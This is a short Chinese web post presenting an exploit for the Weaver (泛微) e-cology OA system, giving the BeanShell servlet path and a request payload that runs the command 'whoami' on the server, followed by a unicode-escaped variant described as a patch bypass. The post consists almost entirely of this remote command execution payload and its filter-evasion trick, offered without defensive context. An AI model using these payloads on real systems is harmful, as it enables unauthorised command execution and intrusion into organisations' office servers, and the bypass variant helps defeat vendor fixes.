泛微 e-cology OA 新漏洞EXP

Mr.Wu 329 0

漏洞路径:/weaver/bsh.servlet.BshServle

bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

补丁绕过:

bsh.script=ex\u0065c("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

广告

打赏
发表评论 取消回复
表情 图片 链接 代码

分享
微信
微博
QQ